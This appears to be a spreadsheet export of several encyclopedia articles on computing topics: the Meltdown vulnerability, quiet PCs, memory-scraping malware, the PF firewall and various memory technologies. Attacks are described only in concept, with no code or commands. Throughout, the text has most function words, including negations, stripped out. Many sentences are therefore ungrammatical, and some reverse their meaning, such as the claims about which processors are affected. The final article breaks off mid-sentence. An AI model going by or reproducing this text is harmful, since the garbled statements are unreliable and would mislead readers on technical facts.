in-use memory effect memory active processes every process's virtual memory. systems physical memory mapped well, speed efficiency. this usually considered safe, operating system rely privilege controls built processor itself, limit areas memory given process permitted access. attempt access authorized memory immediately succeed, attempt access unauthorized memory cause exception void read instruction, fail. either calling process operating system directs happen attempt made read unauthorized memory typically causes error condition process attempted execute read terminated. unauthorized reads usually part normal program execution, much faster approach pause process every time executes function requires privileged memory accessed, allow memory mapped readable address space.instruction pipelining speculative execution used allow instructions execute efficient manner possible necessary allowing order parallel across various processing units within long final outcome correct.modern processors commonly contain numerous separate execution units, scheduler decodes instructions decides, time executed, efficient execute them. this might involve decision instructions execute time, even order, different execution units (known "instruction pipelining"). long correct outcome still achieved, maximizes efficiency keeping processor's execution units much possible. some instructions, conditional branches, lead different outcomes, depending condition. example, value take action, otherwise take different action. cases, know branch take. this value uncached. rather wait learn correct option, proceed immediately (speculative execution). either guess correct option (predictive execution) even take (eager execution). executes incorrect option, attempt discard effects incorrect guess. (see also: branch predictor)cpu cache modest amount memory within used ensure work high speed, speed memory access, facilitate "intelligent" execution instructions efficient manner.from perspective cpu, computer's physical memory slow access. also instructions runs often repetitive, access similar memory numerous times. maximize efficient cpu's resources, modern cpus often modest amount fast on-chip memory, known "cpu cache". when data accessed instruction read physical memory, copy information routinely saved cache time. later needs instruction memory contents again, obtain minimal delay cache rather waiting request related physical memory take place. meltdown exploit ordinarily, mechanisms described considered secure. they provide basis modern operating systems processors. meltdown exploits features interact bypass cpu's fundamental privilege controls access privileged sensitive data operating system processes. understand meltdown, consider data mapped virtual memory (much process supposed able access) responds process attempts access unauthorized memory. process running vulnerable version windows, linux, macos, 64-bit processor vulnerable type. this common combination across almost desktop computers, notebooks, laptops, servers mobile devices. encounters instruction accessing value, address forbidden process virtual memory system privilege check. because speculative execution, instruction scheduled dispatched execution unit. this execution unit schedules privilege check memory access. encounters instruction accessing address base+a, base chosen attacker. this instruction also scheduled dispatched execution unit. privilege check informs execution unit address value, involved access forbidden process (per information stored virtual memory system), thus instruction fail subsequent instructions effects. because instructions speculatively executed, however, data base+a cached privilege check undone execution unit part cpu). indeed case, mere caching constitutes leak information itself. point, meltdown intervenes. process executes timing attack executing instructions referencing memory operands directly. effective, operands instructions must addresses cover possible address, base+a, rejected instruction's operand. because data address referred rejected instruction, base+a, cached nevertheless, instruction referencing address directly execute faster. process detect timing difference determine address, base+a, calculated rejected instruction thus determine value forbidden memory address.meltdown uses technique sequence read every address interest high speed, depending running processes, result contain passwords, encryption data, sensitive information, address process exists memory map. practice, cache side-channel attacks slow, faster extract data time (only cache attacks needed read byte, rather steps tried read bits once). impact impact meltdown depends design cpu, design operating system (specifically uses memory paging), ability malicious party code system, well value data could read able execute. many widely used modern cpus late 1990s early 2018 required exploitable design. however, possible mitigate within design. could detect avoid memory access unprivileged instructions, susceptible cache timing attacks similar probes, removed cache entries upon non-privilege detection (and allow processes access authorized) part abandoning instruction, would able exploited manner. some observers consider software solutions "workarounds" true solution update affected designs remove underlying weakness.operating system most widely used general-purpose operating systems privilege levels virtual memory mapping part design. meltdown access pages memory mapped impact greatest active memory processes memory mapped every process least impact operating system designed almost nothing reached manner. operating system might also able mitigate software extent ensuring probe attempts kind reveal anything useful. modern operating systems memory mapping increase speed could lead performance loss.virtual machine meltdown attack cannot used break virtual machine, i.e., fully virtualized machines guest user space still read guest kernel space, host kernel space. enables reading memory address space represented page table, meaning work virtual tables. that guest-to-host page tables unaffected, guest-to-same-guest host-to-host, course host-to-guest since host already access guest pages. this means different fully virtualized hypervisor cannot access other's data, different users guest instance access other's data.embedded device among vulnerable chips made intel designed standalone embedded devices, mobile phones, smart tvs, networking equipment, vehicles, hard drives, industrial control, like. vulnerabilities, third party cannot code device, internal vulnerabilities remain unexploitable. example, processor cellphone internet things "smart" device vulnerable, processor used device cannot download code, kitchen appliance hard drive controller, believed exploitable.the specific impact depends implementation address translation mechanism underlying hardware architecture. attack reveal content memory mapped user address space, even otherwise protected. example, kernel page-table isolation introduced, versions linux mapped physical memory address space every user-space process; mapped addresses (mostly) protected, making unreadable user-space accessible transitioned kernel. existence mappings makes transitioning kernel faster, unsafe presence meltdown vulnerability, contents physical memory (which contain sensitive information passwords belonging processes kernel) obtained method unprivileged process user-space. according researchers, "every intel processor implements out-of-order execution potentially affected, effectively every processor since 1995 (except intel itanium intel atom 2013)." intel responded reported security vulnerabilities official statement.the vulnerability expected impact major cloud providers, amazon services (aws) google cloud platform. cloud providers allow users execute programs physical servers sensitive data might stored, rely safeguards provided prevent unauthorized access privileged memory locations data stored, feature meltdown exploit circumvents. original paper reports paravirtualization (xen) containers docker, lxc, openvz, affected. they report attack fully virtualized machine allows guest user space read guest kernel memory, read host kernel space. affected hardware meltdown vulnerability primarily affects intel microprocessors, cortex-a75 ibm's power microprocessors also affected. vulnerability affect microprocessors. when effect meltdown first made public intel countered flaws affect processors, denied this, saying believe processors susceptible privilege level protections within paging architecture".researchers indicated meltdown vulnerability exclusive intel processors, spectre vulnerability possibly affect intel, amd, processors. however, announced processors vulnerable meltdown. google reported intel processor since 1995 out-of-order execution potentially vulnerable meltdown vulnerability (this excludes itanium pre-2013 intel atom cpus). intel introduced speculative execution processors intel's family microarchitecture pentium ia-32 microprocessor 1995.arm reported majority processors vulnerable, published list specific processors affected. cortex-a75 core affected directly meltdown spectre vulnerabilities, cortex-r7, cortex-r8, cortex-a8, cortex-a9, cortex-a15, cortex-a17, cortex-a57, cortex-a72 cortex-a73 cores affected spectre vulnerability. this contradicts early statements made meltdown vulnerability intel-only.a large portion current mid-range android handsets cortex-a53 cortex-a55 octa-core arrangement affected either meltdown spectre vulnerability perform out-of-order execution. this includes devices qualcomm snapdragon 630, snapdragon 626, snapdragon 625, snapdragon processors based cores. also, raspberry computers vulnerable either meltdown spectre, except newly-released raspberry uses cortex-a72 cpu.ibm also confirmed power cpus affected attacks. publicly announced exploits also system power8, power9 systems.oracle stated based sparc systems (t5, m10, processors) affected meltdown, though older sparc processors longer supported impacted. mitigation mitigation vulnerability requires changes operating system kernel code, including increased isolation kernel memory user-mode processes. linux kernel developers referred measure kernel page-table isolation (kpti). kpti patches developed linux kernel 4.15, released backport kernels 4.14.11, 4.9.75. released kernel updates enterprise linux distributions version version centos also already released kernel updates centos centos 7.apple included mitigations macos 10.13.2, 11.2, tvos 11.2. these released month vulnerabilities made public. apple stated watchos apple watch affected. additional mitigations included safari update well supplemental update macos 10.13, 11.2.2.microsoft released emergency update windows 8.1, address vulnerability january 2018, well windows server (including server 2008 server 2012 server 2016) windows embedded industry. these patches incompatible third-party antivirus software unsupported kernel calls; systems running incompatible antivirus software receive future windows security updates patched, software adds special registry affirming compatibility. update found caused issues systems running certain cpus, users reporting windows installations boot installation. january 2018, microsoft paused distribution update systems affected cpus investigates addresses bug.it reported implementation kpti lead reduction performance, researchers claiming loss performance, depending usage, though intel considered exaggeration. reported intel processor generations support process-context identifiers (pcid), feature introduced westmere available chips haswell architecture onward, susceptible performance losses kpti older generations lack this selective translation lookaside buffer (tlb) flushing enabled pcid (also called address space number alpha architecture) enables shared behavior crucial exploit isolated across processes, without constantly flushing entire cache primary reason cost mitigation. statement intel said "any performance impacts workload-dependent, and, average computer user, significant mitigated time". phoronix benchmarked several popular games linux system intel's coffee lake core i7-8700k kpti patches installed, found performance impact little non-existent. tests, including synthetic benchmarks databases postgresql redis, impact performance found, accounting even tens percents workloads. more recently, related testings, involving amd's intel's sandybridge ivybridge cpus, reported.several procedures help protect home computers related devices meltdown spectre security vulnerabilities published. meltdown patches produce performance loss. january 2018, unwanted reboots, even newer intel chips, meltdown spectre patches, reported. according dell: 'real-world' exploits vulnerabilities [ie, meltdown spectre] reported date january 2018], though researchers produced proof-of-concepts." further, recommended preventions include: "promptly adopting software updates, avoiding unrecognized hyperlinks websites, downloading files applications unknown sources following secure password protocols [using] security software help protect malware (advanced threat prevention software anti-virus)."on january 2018, current status possible future considerations solving meltdown spectre vulnerabilities presented. march 2018, intel announced designed hardware fixes future processors meltdown spectre-v2 only, spectre-v1. vulnerabilities mitigated partitioning system improves process privilege-level separation. company also announced developed intel microcode workarounds processors dating back 2013, plans develop processors dating back 2007 including core duo; however, month later april 2018, announced backing plan number processor families processor earlier 2008 would patch available.on october 2018, intel reported added hardware firmware mitigations regarding spectre meltdown vulnerabilities latest processors. also transient execution vulnerabilities intel management engine intel subsystem discovered major security vulnerability 2017 pentium f00f pentium fdiv hammer unintended side effect dynamic random-access memory causing memory cells interact electrically spoiler spectre-like, though unrelated, vulnerability affecting intel microprocessors, disclosed 2019. references external links official website meltdown spectre vulnerabilities google project zero write-up cve-2017-5754 national vulnerability database meltdown's proof-of-concept released researchers also published meltdown paper. affected meltdown meltdown checker tool created raphael carvalho meltdown/spectre checker gibson research corporation</t>
  </si>
  <si>
    <t>Quiet PC</t>
  </si>
  <si>
    <t>quiet, silent fanless personal computer makes little noise. common uses quiet include video editing, sound mixing home theater pcs, noise reduction techniques also used greatly reduce noise servers. there currently standard definition "quiet pc", term generally used business context, individuals businesses catering them. proposed general definition sound emitted exceed dba, addition average sound pressure level, frequency spectrum dynamics sound important determining sound computer noticed. sounds smooth frequency spectrum (lacking audible tonal peaks), little temporal variation less likely noticed. character amount noise environment also affects much sound noticed masked, computer quiet relation particular environment users. history prior 1975, computers typically large industrial/commercial machines, often centralized location dedicated room-sized cooling system. systems noise important issue. first home computers, commodore power, therefore could fanless like low-speed used cool power supply, noise seldom issue. 1990s clock speeds increased mhz, "spot-cooling" added means heatsink blow onto processor. over time, fans included provide spot-cooling locations heat dissipation needed, including graphics cards grew powerful. computer cases increasingly needed fans extract heated case, unless carefully designed, would noise. energy star, 1992, similar programs widespread adoption sleep mode among consumer electronics, certified program promoted lower energy consumption. both added features allowed systems consume much power needed particular moment helped reduce power consumption. similar manner first power energy-conserving cpus developed laptops used machine reduce power requirements, hence noise. causes noise main causes noise are: mechanical friction generated disk drives bearings vibration disk drives fans turbulence caused obstructions flow vortex effects blade edges electrical whine: noise generated electrical coils transformers used power supplies, motherboards, video cards monitors.many sources increase power computer. more faster transistors power, releases heat. increasing rotation speed fans address (all things equal) increase noise. similarly, increasing hard disk drives' optical disc drives' rotation speeds increases performance, generally also vibration bearing friction. measuring noise though standards exist measuring reporting sound power output things computer components, often ignored. many manufacturers give sound power measurements. some report sound pressure measurements, often specify sound pressure measurements taken. even basic information measurement distance rarely reported. without knowing measured, possible verify claims, comparisons measurements (e.g. product selection) meaningless. comparative reviews, test several devices conditions, useful, even then, average sound pressure level factor determining components perceived quieter. noise reduction methods common noise reduction methods large, efficient heat sinks incorporate heat pipes, much higher effective thermal conductivity solid copper fans lower speeds larger diameters fans bearing motor noise rather constant-speed fans, thermostatically controlled variable speed fans less maximum speed, thus quieter time efficient power supply minimize waste heat quieter models hard drive solid state devices like compact flash solid-state drives rather traditional mechanical hard drives remote networked rather local disks place damping material sorbothane around hard drives spinning items sound insulation material absorb sound dampen case resonance water cooling, although difficult useful situations low-cost methods number methods exist reducing computer noise little added cost. reduce supply voltage ("undervolting"). many today's cpus stably stock speed, even slight overclock, reduced voltage, reduces heat output. power consumption approximately proportional v2·f, varies linearly clock frequency quadratically voltage. this means even small reduction voltage large effect power consumption. undervolting underclocking also used chipsets gpus. enable cool'n'quiet cpus speedstep (also known eist) intel cpus. reduce speed. newer computers, speed fans varied automatically, depending certain parts computer get. lowering motor's supply voltage reduce speed making quieter lowering amount moves. doing arbitrarily could lead components overheating; therefore, whenever performing hardware work advised monitor temperature system components. fans molex connectors modified easily. with 3-pin fans, either fixed inline resistors diodes, commercial controllers, zalman fanmate, used. software like speedfan argus monitor allow speed control. many newer motherboards support pulse-width modulation (pwm) control, allowing speed bios software. mount fans anti-vibration mounts. remove restrictive grills allow easier airflow, replace noisy grills quieter versions. software nero drivespeed rimhillex reduce speed optical drives. isolate hard disk noise, either using anti-vibration mounts (generally rubber silicone grommets), suspending hard disk fully decouple computer chassis mounting 5.25 inch drive viscoelastic polymer mounts. hard disk's value lowest setting. this reduces seek noise produced hard drive, also reduces performance slightly. operating system spin hard drives short time inactivity. this reduce drive's life span commonly conflicts running programs, though still useful drives used data storage. defragment hard drives reduce drive heads' need search widely data. this also improve performance. arrange components cables improve airflow. wires hanging inside computer block airflow, increase temperature. they easily moved side case pass easily. remove dust inside computer. dust computer parts retain heat. fans draw dust along outside air; build quickly inside computer. dust removed vacuum cleaner, duster, compressed air. special anti-static vacuum cleaners used, however, prevent electrostatic discharge (esd). ideally, would done often enough prevent significant amount dust ever building frequently would need performed would depend entirely environment computer used.in cases acceptable solution relocate too-noisy computer outside immediate working area, access either long-distance hdmi/usb/dvi cables remote desktop software quiet thin client, e.g. based raspberry miniature computer even heat sink. individual components quiet following notes regarding individual components quiet pcs. motherboard, cpu, video card major energy users computer. components need less power easier cool quietly. quiet power supply selected efficient providing enough power computer. motherboard motherboard based chipset uses less energy easier cool quietly. undervolting underclocking generally require motherboard support, available used reduce energy heat output, therefore cooling requirements. many modern motherboard chipsets northbridges come active cooling form small, noisy fan. some motherboard manufacturers replaced fans incorporating large heat sinks heatpipe coolers, however still require good case airflow remove heat. motherboard voltage regulators also often heat sinks need airflow ensure adequate cooling. some motherboards control speed using integrated hardware monitoring chip (often function within super solution), configured bios system monitoring software like speedfan argus monitor, recent motherboards built-in control fans. even though given hardware monitoring chip capable performing control, motherboard manufacturer necessarily wire header pins motherboard correctly hardware monitoring chip, thus sometimes computer control cannot performed given motherboard wiring irregularities, even though software indicate control available underlying support hardware monitoring chip itself. other times, case single fan-control setting affect connector headers motherboard time, even individual settings available hardware monitoring chip itself; wiring issues common makes difficult design good general-purpose user interfaces configuring control.motherboards also produce audible electromagnetic noise. heat output vary according brand model precisely, thermal design power (tdp). intel's third revision pentium using "prescott" core, infamous hottest-running cpus market. comparison, amd's athlon series intel core perform better lower clock speeds, thus produce less heat. modern cpus often incorporate energy saving systems, cool'n'quiet, longhaul, speedstep. these reduce clock speed core voltage processor idle, thus reducing heat. heat produced cpus reduced undervolting, underclocking both. most modern mainstream value cpus made lower reduce heat, noise, power consumption. intel's dual-core celeron, pentium, cpus generally 35–54 generally 64–84 (newer versions, haswell) (older versions, sandy bridge). older cpus core typically core quad cpus mostly 65–95 amd's athlon cpus athlon phenom ranged variant quad-core variants. bulldozer cpus range 95–125 apus range lower-end dual-core variants, higher-end quad-core variants, some processors come special power versions. example, intel's lower cpus video card video card produce significant amount heat. fast largest power consumer computer space limitations, video card coolers often small fans running high speeds, making noisy. options reduce noise source include: replace stock cooler aftermarket one. motherboard video output. typically, motherboard video takes less power, provides lower gaming video decoding performance. select video card fan. most modern graphics cards come tools allow user reduce power target adjust curves, resulting quieter operation cost performance power supply power supply (psu) made quieter higher efficiency (which reduces waste heat need airflow), quieter fans, intelligent controllers (ones correlation temperature speed complex linear), effective heat sinks, designs allow flow less resistance. given power supply size, efficient supplies certified plus generate less heat. power supply appropriate wattage computer important high efficiency minimizing heat. power supplies typically less efficient lightly heavily loaded. high wattage power supplies typically less efficient lightly loaded, instance computer idle sleeping. most desktop computers spend time lightly loaded. example, desktop draw less watts full load, watts less typical.power supplies thermally controlled fans made quieter providing cooler and/or less obstructed source air, fanless power supplies available, either large passive heat sinks relying convection case airflow dissipate heat. also possible fanless power supplies operate like laptops, using external power brick supply power, converted appropriate voltages regulated computer. these power supplies usually lower wattage ratings. electrical coils power supplies produce audible electromagnetic noise become noticeable quiet equipping power cord uses ferrite bead sometimes help reduce humming psu. case case designed noise usually include quiet fans, often come quiet power supply. some incorporate heatsinks cool components passively.larger cases provide space airflow, larger coolers heat sinks, sound dampening material. airflow noise-optimized cases often ducting partitioning within case optimize airflow thermally isolate components. vents ducts easily added regular cases.case designed quiet typically wire grills honeycombed grills. both superior older style stamped grill. features facilitate neat cable management, brackets space cables behind motherboard tray, help increase cooling efficiency. filters help prevent dust coating heat sinks surfaces, dust impedes heat transfer, making fans spin faster. however, filter increase noise restricts airflow much kept clean, requiring larger faster handle pressure drop behind filter. soundproofing inside case lined dampening materials reduce noise attenuating vibration case panels extensional damping constrained-layer damping reducing amplitude vibration case panels increasing mass absorbing airborne noise, foam cooling systems heat sink large heat sink designed operate efficiently little airflow often used quiet computers. often heat pipes used efficiently distribute heat heat sink. fans all, quiet typically larger-than-usual low-speed fans quiet-running motors bearings. size common, fans used cases heat sinks allow them. quiet manufacturers include nexus, ebm-papst, yate loon, scythe, noctua. extensive comparative surveys posted spcr madshrimps.fan noise often proportional speed, controllers used slow fans precisely choose speed. controllers produce fixed speed using inline resistor diode; variable speed using potentiometer supply lower voltage. speed also reduced crudely plugging power supply's volt line instead volt line potential difference volts, although cripples fan's speed sensing). most fans volts spinning, start reliably less some simple controllers vary fans' supply voltage avoid problem entirely. some controllers start drop voltage seconds. control, however, easiest efficient option modern motherboards headers. control rapidly cycles feeding full voltage voltage, control rotational speed. typically motherboard chipset provides temperature data sensors control speed. bearing motor noise important consideration. soft mounting fans (e.g. rubber silicone isolators) help reduce transfer vibration components.piezoelectric fans often quieter rotating fans consume less power. intel, murata, others recently done development piezoelectric fans desktop pcs. watercooling watercooling method heat-dissipation transferring heat conductive material contact liquid, demineralised water additive prevent bacterial growth. this water travels loop usually contains reservoir, radiator pump. modern pump technologies allow extremely powerful quiet designs. efficiently transferring device heat separate heat exchanger larger heat sinks fans, watercooling allow quieter overall operation. devices gpus, northbridges, southbridges, hard disk drives, memory, voltage regulator modules (vrms), even power supplies separately watercooled; fact whole immersed, cases. secondary storage hard drive older hard drive used ball bearing motors recent desktop hard drives quieter fluid bearing motors.the smaller 2.5" form-factor hard drives generally vibrate less, quieter, less power traditional 3.5" drives, often lower performance less capacity, cost gigabyte. minimize vibrations hard drive transferred amplified case, hard drives mounted soft rubber studs, suspended elastics placed soft foam sorbothane. hard disk enclosures also help reduce drive noise, care must taken ensure drive gets adequate cooling disk temperatures often monitored smart software. solid-state storage solid-state drive moving mechanical components runs silently, 2016) still roughly four times expensive unit storage consumer-grade hdds.in cases, solid state storage methods suitable: compact flash (cf) cards used secondary storage. because slightly modified parallel (pata) interface, simple adapter needed connect cards function pata card hard disk. cards also small, allowing made, produce noise, little power (further reducing heat output ac/dc conversion psu), insignificant amount heat. however, expensive available small capacities also issues regarding maximum number writes sector. flash drives used motherboard supports booting usb. they based flash memory, advantages disadvantages cards, except speed limited bus. i-ram solid-state disk four dimm slots allow regular used like disk. much faster hard disk, write cycle limitations flash memory, however requires power continuously order maintain contents (from standby power battery system off), uses power many laptop hard drives, maximum capacity gib, expensive.all forms solid-state storage expensive traditional spinning-disk drives, quiet designs conjunction secondary hard drive accessed needed, network-attached storage, less-quiet traditional hard drives kept remote. optical drive optical drives slowed software quiet them, nero drivespeed, emulated virtual drive programs daemon tools eliminate noise entirely. notebook optical drives used, tend quieter, however tend slower (typically speed, speed). some drives feature, commonly called riplock, reduces drive noise slowing drive video playback. playback operations real time) speed required. external components monitor monitor produce coil noise, external power supply monitor voltage converter monitor's backlight. monitors tend produce least noise (whine) full brightness. reducing brightness using video card introduce whine, reduce color accuracy. monitor external power supply tucked produce less noticeable noise power supply built screen housing. printer past, particularly noisy printers matrix daisy wheel designs often housed soundproofed boxes cabinets, technique used modern printers reduce perceived noise. another solution network printer, locate physically away immediate work area. laptop contrast desktop pcs, laptops notebooks typically power supply fans video card fans, generally physically smaller hard drives lower-power components. however, laptop fans usually smaller, necessarily quieter desktop counterparts smaller area requires faster speeds move amount air. furthermore, limited space, limited access proprietary components make silencing difficult. fanless number laptops netbooks however cooling fans all.fanless portable computers (tablet pcs, subnotebooks, chromebooks, ultrabooks 2-in-1 pcs) running 10-15 mobile cpus (most commonly processors) became popular netbooks mainly introduction first ipad 2010. first ipad's cpu, cortex-a8 first cortex design adopted large scale consumer devices. references external links silent review articles various aspects acoustics. what "silent" computer?, silent review, september 2006. what "silent" computer? dutch), vrad. reference/recommended, silent review. nutshell, silent review. silent.</t>
  </si>
  <si>
    <t>Memory-scraping malware</t>
  </si>
  <si>
    <t>memory-scraping malware scrapping malware malware scans memory digital devices, notably point-of-sale (pos) systems, collect sensitive personal information, credit card numbers personal identification numbers (pin) purpose exploitation. operation magnetic stripe payment cards hold three different data tracks track track track scrapers created implement expression matches gain access collect track track card data process memory. some scrapers luhn algorithm check validity card data exfiltration. also point-of-sale malware references</t>
  </si>
  <si>
    <t>PF (firewall)</t>
  </si>
  <si>
    <t>(packet filter, also written licensed stateful packet filter, central piece software firewalling. comparable netfilter (iptables), ipfw, ipfilter. developed openbsd, ported many operating systems. history originally designed replacement darren reed's ipfilter, derives much rule syntax. ipfilter removed openbsd's tree 2001 openbsd developers' concerns license.the initial version written daniel hartmeier. appeared openbsd 3.0, released december 2001.it later extensively redesigned henning brauer ryan mcbride code written henning brauer. henning brauer currently main developer features filtering syntax similar ipfilter, modifications make clearer. network address translation (nat) quality service (qos) integrated features pfsync carp failover redundancy, authpf session authentication, ftp-proxy ease firewalling difficult protocol, also extended also supports (symmetric multiprocessing) (stateful tracking options). many innovative features pf's logging. pf's logging configurable rule within pf.conf logs provided pseudo-network interface called pflog, lift data kernel-level mode user-level programs. logs monitored using standard utilities tcpdump, openbsd extended especially purpose, saved disk tcpdump/pcap binary format using pflogd daemon. ports apart running home platform openbsd, ported many operating systems, however major differences capabilities. some ports date back many years. openbsd always latest version features. currently used freebsd starting version 5.3apple macos starting snow leopard (mac 10.6) apple ipados, used iphones ipads netbsd version dragonfly version debian gnu/kfreebsd oracle solaris thereby many blackberry smartphones models also internet protocol suite reverse-path forwarding references books hansteen, peter n.m. (october 2014). book no-nonsense guide openbsd firewall ed.). starch press. 248. isbn 978-1-59327-589-1.jeremy reed, (august 2006). openbsd packet filter book: netbsd, freebsd, dragonfly, openbsd. reed media services. isbn 978-0-9790342-0-6.artymiak, jacek (2003). building firewalls openbsd selbstverlag. isbn 978-8391665114. external links pf(4) openbsd kernel interfaces manual pfctl(8) openbsd system manager's manual openbsd guide firewalling tutorial peter hansteen openbsd/pf firewalling less gifted</t>
  </si>
  <si>
    <t>Memory ProteXion</t>
  </si>
  <si>
    <t>computer memory, memory protexion, found xseries servers, form "redundant steering". this technology uses redundant bits data packet recover dimm failure. memory protexion different normal error correction uses bits ecc, leaving bits behind. these bits used re-route data failed memory, much like spare raid. used reconstruct data, extra bits store memory protexion, also known “redundant steering”, technology behind using redundant bits data packet provide backup event dimm failure. failure cause predictive failure analysis issued dimm, failures issue inform system administrator replacement needed. also chipkill external links memory protexion</t>
  </si>
  <si>
    <t>Memory ballooning</t>
  </si>
  <si>
    <t>computing, memory ballooning technique used eliminate need overprovision host memory used virtual machine (vm). implement virtual machine's kernel implements "balloon driver" allocates unused memory within vm's address space reserved memory pool (the "balloon") unavailable processes however, rather reserved uses within physical memory mapped pages within actually unmapped host operating system's hypervisor, making available uses host machine. depending amount memory required size "balloon" increased decreased dynamically, mapping unmapping physical memory required references also memory overcommitment thin provisioning</t>
  </si>
  <si>
    <t>Memory corruption</t>
  </si>
  <si>
    <t>memory corruption occurs computer program contents memory location modified programmatic behavior exceeds intention original programmer program/language constructs; termed violation memory safety. likely causes memory corruption programming errors (software bugs). when corrupted memory contents used later program, leads either program crash strange bizarre program behavior. nearly application crashes windows systems heap corruption.modern programming languages like powerful features explicit memory management pointer arithmetic. these features designed developing efficient applications system software. however, using features incorrectly lead memory corruption errors. memory corruption intractable class programming errors, reasons: source memory corruption manifestation apart, making hard correlate cause effect. symptoms appear unusual conditions, making hard consistently reproduce error.memory corruption errors broadly classified four categories: using uninitialized memory: contents uninitialized memory treated garbage values. using values lead unpredictable program behavior. using non-owned memory: common pointers access modify memory. pointer null pointer, dangling pointer (pointing memory already freed), memory location outside current stack heap bounds, referring memory possessed program. using pointers serious programming flaw. accessing memory usually causes operating system exceptions, commonly lead program crash (unless suitable memory protection software used). using memory beyond memory allocated (buffer overflow): array used loop, incorrect terminating condition, memory beyond array bounds accidentally manipulated. buffer overflow common programming flaws exploited computer viruses, causing serious computer security issues (e.g. return-to-libc attack, stack-smashing protection) widely used programs. cases programs also incorrectly access memory start buffer. faulty heap memory management: memory leaks freeing non-heap un-allocated memory frequent errors caused faulty heap memory management.many memory debuggers purify, valgrind, insure++, parasoft c/c++test, addresssanitizer available detect memory corruption errors. also storage violation references external links memory corruption tutorial introduction exploitation techniques protection mechanisms</t>
  </si>
  <si>
    <t>Memory divider</t>
  </si>
  <si>
    <t>memory divider ratio used determine operating clock frequency computer memory accordance front side (fsb) frequency, memory system dependent clock speed. along memory latency timings, memory dividers extensively used overclocking memory subsystems find stable, working memory states higher frequencies. ratio dram commonly referred "dram:fsb ratio". memory dividers applicable chipsets memory speed dependent speeds. certain chipsets like nvidia 680i separate memory lanes memory clock clock asynchronous memory dividers used there. setting memory speeds overclocking memory systems chipsets different issues memory dividers. this article applicable chipsets memory clock dependent clock. overview memory dividers allow system memory slower faster actual (front side bus) speed. ideally, front side system memory clock speed connects system memory cpu, sometimes desired system memory different clock speeds. possible memory clock different clock speeds, within certain limits motherboard corresponding chipset. settings termed memory divider fsb/dram settings available expressed "ratio" control difference memory clock rate speed. entry level motherboards usually provide memory dividers changed memory dividers managed memory controller chipset supports memory dividers). high motherboards meant overclocking provide facilities change memory dividers chipset supports memory dividers). however, certain chipsets memory dividers used, systems memory speed independent speed. description application usually (memory divider) (front side frequency) gives clock memory. memory clock determines final operating frequency effective clock speed memory system depending upon dram types (ddr, ddr2 ddr3 sdram). default, speed memory usually ratio, meaning increasing speed overclocking) increases memory speed amount. normally system memory built overclocking thus able take level overclocking processor motherboard achieve. memory divider allows users mitigate problem reducing speed increase memory relative processor. example suppose computer system memory, memory divider 1:1, operating multiplier 10x. then, base memory clock operate (memory divider) (fsb) effective memory clock would since system ("ddr" stands double data rate; effective memory clock speed double actual clock speed). operate ghz. using frequency various types dram operate sdram (ddr-400 pc-3200) ddr2 sdram (ddr2-800 pc2-6400) ddr3 sdram 1600 (ddr3-1600 pc3-12800) suppose overclock operates memory clock operates (memory divider fsb). since ddr-400 used effective memory clock (actual memory frequency) mhz. normal ddr-400 sdram fail work since designed work system become unstable. modern (having overclocking potential) work (even designed work ghz) flawlessly without giving problem stability. keep running overclocked even higher speeds increasing fsb) need slow memory clock achieve stable system. decrease dram:fsb ratio resulting memory clock speed (4/5) resulting effective clock speed ddr-400. able operate upon stable overclocked without increasing effective memory clock. also multiplier references what memory divider important overclocking concepts</t>
  </si>
  <si>
    <t>Memory forensics</t>
  </si>
  <si>
    <t>memory forensics forensic analysis computer's memory dump. primary application investigation advanced computer attacks stealthy enough avoid leaving data computer's hard drive. consequently, memory (ram) must analyzed forensic information. history zeroth generation tools prior 2004, memory forensics done basis, using generic data analysis tools like strings grep. these tools specifically created memory forensics, therefore difficult use. they also provide limited information. general, primary usage extract text memory dump.many operating systems provide features kernel developers end-users actually create snapshot physical memory either debugging (core dump blue screen death) purposes experience enhancement (hibernation (computing)). case microsoft windows, crash dumps hibernation present since microsoft windows microsoft crash dumps always analyzable microsoft windbg, windows hibernation files (hiberfil.sys) nowadays convertible microsoft crash dumps using utilities like moonsols windows memory toolkit designed matthieu suiche. first generation tools february 2004, michael ford introduced memory forensics security investigations article sysadmin magazine. article, demonstrated analysis memory based rootkit. process utilized existing linux crash utility well tools developed specifically recover analyze memory forensically, memget mempeek. 2005, dfrws issued memory analysis forensics challenge. response challenge, tools generation, specifically designed analyze memory dumps, created. these tools knowledge operating system's internal data structures, thus capable reconstructing operating system's process list process information.although intended research tools, proved operating system level memory forensics possible practical. second generation tools subsequently, several memory forensics tools developed intended practical use. these include commercial tools like responder pro, memoryze, moonsols windows memory toolkit, winen, belkasoft live capturer, etc.; open source tools like volatility. features added, analysis linux memory dumps, substantial academic research carried out.unlike microsoft windows, interest relatively initiated matthieu suiche 2010 black briefings security conference. currently, memory forensics standard component incident response. third generation tools since 2010, started utilities focusing visualization aspect memory analysis moonsols livecloudkd presented matthieu suiche microsoft bluehat security briefings inspired feature microsoft livekd written mark russinovich allow virtual machines introspection accessing memory guest virtual machine host virtual machine order either analyze directly assistance microsoft windbg acquire memory dump microsoft crash dump file format. references</t>
  </si>
  <si>
    <t>Memory overcommitment</t>
  </si>
  <si>
    <t>memory overcommitment concept computing covers assignment memory virtual computing devices processes) physical machine hosted, running actually has. this possible virtual machines processes) necessarily much memory point assigned, creating buffer. four virtual machines memory physical machine memory, virtual machines using possible create additional virtual machines take advantage existing machine leaving free. memory swapping used handle spikes memory usage. disadvantage approach memory swap files slower read 'actual' memory, lead performance drops.while memory overcommitment usually talked context virtualization, actually generalised concept; windows contained overcommitment features, modern generalised operating systems, including linux kernel. also memory ballooning references</t>
  </si>
  <si>
    <t>Memory safety</t>
  </si>
  <si>
    <t>memory safety state protected various software bugs security vulnerabilities dealing memory access, buffer overflows dangling pointers. example, java said memory-safe runtime error detection checks array bounds pointer dereferences. contrast, allow arbitrary pointer arithmetic pointers implemented direct memory addresses provision bounds checking, thus potentially memory-unsafe. history memory errors first considered context resource management time-sharing systems, effort avoid problems fork bombs. developments mostly theoretical morris worm, exploited buffer overflow fingerd. field computer security developed quickly thereafter, escalating multitudes attacks return-to-libc attack defense techniques non-executable stack address space layout randomization. randomization prevents buffer overflow attacks requires attacker heap spraying application-dependent methods obtain addresses, although adoption slow. however, deployments technology typically limited randomizing libraries location stack. approaches diehard, redesign dieharder, allinea distributed debugging tool special heap allocators allocate objects random virtual memory page, allowing invalid reads writes stopped debugged exact instruction causes them. protection relies upon hardware memory protection thus overhead typically substantial, although grow significantly program makes heavy allocation. randomization provides probabilistic protection memory errors, often easily implemented existing software relinking binary. memcheck tool valgrind uses instruction simulator runs compiled program memory-checking virtual machine, providing guaranteed detection subset runtime memory errors. however, typically slows program factor furthermore must explicitly informed custom 